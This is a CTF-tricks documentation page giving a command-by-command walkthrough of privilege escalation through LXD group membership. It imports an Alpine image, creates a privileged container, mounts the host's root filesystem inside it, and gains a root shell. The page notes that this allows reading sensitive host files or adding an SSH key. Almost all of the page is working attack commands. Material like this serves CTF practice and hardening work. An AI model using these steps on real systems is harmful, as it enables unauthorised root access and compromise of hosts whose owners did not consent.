> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/container-breakout/trick-0111.md).

# LXD Group Privilege Escalation

***

First, verify membership in the `lxd` group. You can check this using the `id` command:

```bash
id
```

Alternatively, you can inspect the `/etc/group` file:

```bash
grep lxd /etc/group
```

If you are in the `lxd` group, you can exploit this to gain root on the host. You'll need an LXD image, such as Alpine. A common method is to download a pre-built image. For example, you can download a specific Alpine image using `wget`:

```bash
wget https://images.linuxcontainers.org/images/alpine/3.10/amd64/default/20191024_0136/rootfs.tar.gz -O alpine.tar.gz
```

Alternatively, you can build one using the `lxd-alpine-builder` script:

```bash
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
# May require internet and root/sudo
sudo ./build-alpine
```

Transfer the generated `./alpine.tar.gz` to the target machine if built elsewhere. Then import the image into LXD, assigning it an alias like `myimage`:

```bash
lxc image import ./alpine.tar.gz --alias myimage
```

You can verify the image was imported correctly:

```bash
lxc image list
```

If LXD is not initialized, you may need to run `lxd init` (defaults are usually fine). Now, create a privileged container from your image. The `security.privileged=true` flag is crucial for this exploit as it disables security restrictions that would normally prevent root inside the container from being root on the host.

```bash
lxc init myimage mycontainer -c security.privileged=true
```

Once the container is created, configure it to mount the host's filesystem (`/`) at `/mnt/root` inside the container. This allows you to access the host's files from within the container.

```bash
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
```

An alternative, more concise command to create and start the privileged container is `lxc launch`:

```bash
lxc launch myimage mycontainer -c security.privileged=true
```

This single command combines the `init` and `start` steps.

Verify the container has been created:

```bash
lxc list
```

If you used `lxc init`, start the container:

```bash
lxc start mycontainer
```

Then, get a shell inside the running container using `lxc exec`:

```bash
lxc exec mycontainer /bin/sh
```

Inside the container, navigate to the mounted host filesystem:

```bash
# Inside container:
cd /mnt/root
```

You are now in the host's root filesystem (`/`) with root privileges from the privileged container. You can now perform actions on the host as root, such as reading sensitive files or adding your SSH key.

To clean up the resources created during this process:

```bash
lxc stop mycontainer
lxc delete mycontainer
lxc image delete myimage
```
